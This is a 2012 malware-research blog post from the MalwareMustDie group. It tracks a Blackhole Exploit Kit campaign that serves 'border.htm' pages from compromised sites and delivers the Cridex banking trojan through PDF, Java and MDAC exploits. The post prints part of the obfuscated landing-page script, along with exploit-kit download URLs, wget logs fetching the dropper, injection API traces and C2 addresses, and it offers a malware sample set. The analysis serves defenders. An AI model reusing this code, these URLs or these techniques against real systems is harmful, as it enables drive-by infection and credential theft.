(Updated) A tale of mass infection of BHEK2 "border.htm" during ddos storm - Changes in JAR detected - Payload : Cridex - Malware Crusaders Logs
22 Oct 2012 This post is dedicated to the wonderful individuals, came from varied countries and cultures, gathered to be together to push infection of malware down to the very minimum level of infection by agressively researching new infections during their rest/private time in weekends. This is the story of #MalwareMustDie, the malware crusaders with its Team Work Report:It is a quicky, and since the bad guys is also monitoring us now I'll make it short. Found new update of BHEK2 trends. In the past 2days during ddos storm these landing pages NEW infections had appeared, a large infections of border.htm files has been spotted everywhere. Storms made us slow in detecting these, by the time we found it the infection was already deep spreaded, it was at the time we decided to end the last crusade. So this is the last battle's report:
h00p://regioneconomrazvitie.ru/border.htmWith some formula we can grab all samples w/o problems:
h00p://alfa-opora.ru/border.htm
h00p://brandonchurch.ca/border.htm
h00p://carobnoselo.co.rs/border.htm
h00p://downendchristadelphians.org.uk/border.htm
h00p://dstamac.com/border.htm
h00p://hopsshack.com/border.htm
h00p://kotkankoiraystavainseura.fi/border.htm
h00p://ncrg.info/border.htm
h00p://orejitassanas.com/border.htm
h00p://techjamcincinnati.org/border.htm
h00p://www.binarius.pt/border.htm
h00p://www.burghotel-bad-belzig.de/border.htm
h00p://www.eetrans.ru/border.htm
h00p://www.kulich.hu/border.htm
h00p://www.mvlcs.org/border.htm
h00p://www.partylooxx.nl/border.htm
h00p://www.resgroup.com/border.htm
h00p://www.ribon.ro/border.htm
h00p://www.rzua.org/border.htm
h00p://www.s-a-n.nl/border.htm
h00p://www.schwabinger-ernaehrungsstudio.de/border.htm
h00p://www.su-woerschach.at/border.htm
h00p://www.szhuaheng.com/border.htm
h00p://www.usv-gaweinstal.at/border.htm
h00p://центрцен.рф/border.htm
--23:12:50-- h00p://secondhand4u.ru:8080/forum/links/column.phpFile looks like:
=> `column.php'
Resolving secondhand4u.ru... 209.51.221.247, 72.18.203.140, 203.80.16.81
Connecting to secondhand4u.ru|209.51.221.247|:8080... connected.
HTTP request sent, awaiting response... 200 OK
HTTP/1.0 200 OK
Server: nginx/1.0.10
Date: Sun, 21 Oct 2012 14:08:38 GMT
Content-Type: text/html; charset=CP-1251
X-Powered-By: PHP/5.3.17-1~dotdeb.0
Vary: Accept-Encoding
Via: 1.0 localhost (squid/3.1.6)
Proxy-Connection: close
Length: unspecified [text/html]
23:12:53 (49.74 KB/s) - `column.php' saved [28835]
$ ls -alF column.phpThe data itself contains malc0de as below snips:
-rwx------ 1 malware mustdie 28835 Oct 21 05:12 column.php*
<html><head><title></title></head><body><div dqa="With the hexed complete data is here:--->>[PASTEBIN]
665b686966^621e5c6h6h_6h6h665b68$6966621e62(696060
25#2a5b6c5b59*2458253462!6960603566^5b68696662_1e5
63!62685b6c68^252525256f_5f5c241f5h$6g6g1f245h(2a6
2c6h6h#354860695" 57="96268+37586h5f5c%245829612a)
:
:
85b$625b66245a(2859285c57@60675b256h&5b60675b6f+5f
58&2a5a5" 8="362595768$24511g2c1g(281g2c1g28@1g2c1
$25512c536g(6g5g2a5863@5a6d25355f&5c245d256f+5f5c2
a245725#256f57371g*1g6h5f5c24!5h2a5f674b^68665f625
43d3b32!3b3331322c^292e322c3e_2" 16="725256f@5f5c2
2a665b)575a6d4b68#57685b3737*2g25256f5f!5c241f612a
5b62^5d685e2222_592a4f445c$6962596751(592a4f445c@6
if(window.document){if(021==0x11)d=window.document
try{asd3*f2}catch(dsgdsg){a=d[g](ggg);}
s="";
for(i=0;;i++){
asd2();
if(r){s=s+r;}else break;
}
a=s;
s="";
k="";
asd3();
qa=0x12;
for(i=0;i<a.length;i+=2){
asd5();
}
asd();}
</script></body></html>
As usual it can be deobfs into PluginDetect here:--->>[PASTEBIN]
Which can alternatively be decoded manually like this:---->>[PASTEBIN]
Shortly, this border.htm infections case are using same PluginDetect which infection of Cridex
(we thought was Zbot) with the below steps :
2. Using function (c, b, a) + catching these parameters for Exploits = {d,f,h,m.i.e}
3. Makes you downloads exploit PDF(CVE-2010-0188) & jar component. jar exploits with CVE-2012-0507, flooding AtomicReferenceArray & using cracking singleton method to bypass JRE environment (used IllegalArgumentException, SecurityException, InstantiationException,etc) and push url download command to download a trojan dropper, Our PoC during analyzing jar code is as per snipped below:
IMPORTANT NOTE: This Jar infection marks the first time the BHEK authors have used two forms of obfuscation in the param value field.
The full details of JAR decoded is in here:-->>[MMDCrackTeamBlog] Through PDF & JAR exploits downloads trojan/dropper "via" below urls forms:
(there's a direct download link too but sorry we're not going to expose it here..)
h00p://secondhand4u.ru:8080/forum/links/column.php?hqc=350a050538&pcxii=3307093738070736060b&nkwrjmje=04&dpgqcro=ebsvhag&avw=qxkszjzu
h00p://secondhand4u.ru:8080/forum/links/column.php?sgvdom=0404070908&ggwkc=3307093738070736060b&xbpknd=03&vjydansz=ctqdpz&jdrht=jkdu
h00p://secondhand4u.ru:8080/forum/links/column.php?zf=3436353638&oe=3307093738070736060b&n=02&re=e&mk=k
Not only PDF/JAR, PluginDetect will hit you with CVE-2006-0003 (MDAC) w/ActiveX Object : BD96C556-65A3-11D0-983A-00C04FC29E36 to drop trojan malware via msxml2.XMLHTTP to your PC with API: SaveToFile .//..//SOMETHING.exe) As you can see, a triple hit exploit, to same Cridex payload.
4. ↑that PDF and Jar files we post in VT is as per below VT details:
Jar: https://www.virustotal.com/file/c24b87d6580b21e39f744a77babdd317d5aa8a94bdadeb5edde9f018a50fb093/analysis/5. You will get exploited by above details & brings you to saved trojan in exe file as, per below PoC:
PDF: https://www.virustotal.com/file/ed3ae7ef961218a165c3fda730d88d871fe0f0a00693958f3bdc4f55cdef03c6/analysis/
--01:04:06-- h00p://secondhand4u.ru:8080/forum/links/column.php?sgvdom=0404070908&ggwkc=3307093738070736060b&xbpknd=03&vjydansz=ctqdpz&jdrht=jkdu
=> `column.php@sgvdom=0404070908&ggwkc=3307093738070736060b&xbpknd=03
&vjydansz=ctqdpz&jdrht=jkdu'
Resolving secondhand4u.ru... 72.18.203.140, 203.80.16.81, 209.51.221.247
Connecting to secondhand4u.ru|72.18.203.140|:8080... connected.
HTTP request sent, awaiting response... 200 OK
HTTP/1.0 200 OK
Server: nginx/1.0.10
Date: Sun, 21 Oct 2012 22:43:38 GMT
Content-Type: application/x-msdownload
X-Powered-By: PHP/5.3.17-1~dotdeb.0
Pragma: public
Expires: Sun, 21 Oct 2012 14:22:22 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="calc.exe"
Content-Transfer-Encoding: binary
Content-Length: 87040
Connection: close
Length: 87,040 (85K) [application/x-msdownload]
100%[====================================>] 87,040 108.56K/s
01:04:10 (108.42 KB/s) - `calc.exe' saved [87040/87040]
VT shows:
6. Dropped/Self Copied Trojan:
It dropped itself and saved it in %AppData% folder.
Dropper & Memory Inject API / Reversing + Behavior PoC is:
(1) PID: 0x4acPS: original PE sample also self-deleted.
File: C:\calc.exe
Address: 0x4079ce
CopyFileW(
lpExistingFileName: "C:\calc.exe",
lpNewFileName: "C:\Documents and Settings\User\Application Data\KB00085031.exe",
bFailIfExists: 0x0);
(2) PID: 0x674
File: C:\Documents and Settings\User\Application Data\KB00085031.exe"
Address: 0x403822
CreateRemoteThread
(hProcess: 0x78,
lpThreadAttributes: 0x0,
dwStackSize: 0x0,
lpStartAddress: 0xe5eca0,
lpParameter: 0xe50000,
dwCreationFlags: 0x0,
lpThreadId: 0x0);
The dropped Trojan (payload) is :
According to the new feature "Behavioutal Information" of VT, this payload trojan did:
Written files...
C:\DOCUME~1\~1\LOCALS~1\Temp\exp1.tmp.bat (successful)
Copied files...
SRC: C:\4481dc0cc0fd454ecbbbc9329b1c9da4a875078a3b0693f77ad4e6deea72d1fb
DST: C:\Documents and Settings\\Application Data\KB00927107.exe (successful)
Deleted files...
C:\4481dc0cc0fd454ecbbbc9329b1c9da4a875078a3b0693f77ad4e6deea72d1fb (successful)
C:\DOCUME~1\~1\LOCALS~1\Temp\exp1.tmp.bat (successful)
Created processes...
C:\WINDOWS\system32\cmd.exe" /c "C:\DOCUME~1\~1\LOCALS~1\Temp\exp1.tmp.bat"" (successful)
C:\Documents and Settings\\Application Data\KB00927107.exe (successful)
Code injections in the following processes...
python.exe (successful)
VBoxTray.exe (successful)
We just finished full behavior test of the dropped Trojan, PoC:(additional) According to Contagio is a Cridex: (thanks to @snowfl0w)
7. The network analysis can be seen here:--->>[PASTEBIN]
With the summary as per below:7.1. It requested handshake to 3(three) remote IP:
188.40.0.138
203.217.147.52 and
41.168.5.140 // I tried this 5 times, same pattern.. no miss..
7.2. It established connection with 41.168.5.140
7.3. Send POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1 contains encryption.
7.4. See below for the sample of each unique packet we trapped
(Suspected crypted credentials on outgoing packets
8. The registry analysis can be seen here: --->>[PASTEBIN]
With the summary as per below:8.1. Autorun of the dropped trojan9. The CNC was solved as per this report:--->>[PASTEBIN] by our member :-)
8.2. Cannot expose further yet but many chipers are registered.
8.8. Suspected screenshot templates detected:..\WinPos1024x768(1).left: 0x000000C0
..\WinPos1024x768(1).left: 0x0000006E
..\WinPos1024x768(1).top: 0x00000027
..\WinPos1024x768(1).top: 0x0000008A
..\WinPos1024x768(1).right: 0x000003E0
..\WinPos1024x768(1).right: 0x0000038E
..\WinPos1024x768(1).bottom: 0x0000027F
..\WinPos1024x768(1).bottom: 0x000002E2
..\WinPos1024x768(1).left: 0x000000C0
..\WinPos1024x768(1).left: 0x0000006E
..\WinPos1024x768(1).top: 0x00000027
..\WinPos1024x768(1).top: 0x0000008A
..\WinPos1024x768(1).right: 0x000003E0
..\WinPos1024x768(1).right: 0x0000038E
..\WinPos1024x768(1).bottom: 0x0000027F
..\WinPos1024x768(1).bottom: 0x000002E2
:
@malwaremustdie nice work. in your last post MD5: e86d8403f74bd18de027996abae4156a does not look like zbot. I'd say its cridex.
— snowfl0w (@snowfl0w) October 21, 2012
As the trophy of the current findings is the head of these malwares as per - below family pic:-)
We are also requested the sample of the current infections by researchers.
Contagio looks busy, so you can download here:--->>[SAMPLE-SET]
(Mention us in twitter for password request)
Cridex Reference:
M86 - The Cridex Trojan Targets 137 Financial Organizations in One Go
Stop Malvertising - Analysis of Cridex
DeepEnd Research - Blackhole & Cridex: Se2 Ep1: Intuit Spam & SSL traffic analysis
Contagio - Cridex Analysis using Volatility - by Andre' DiMino
Kahu Security - Spear-Phish Leads to Cridex
#MalwareMustDie!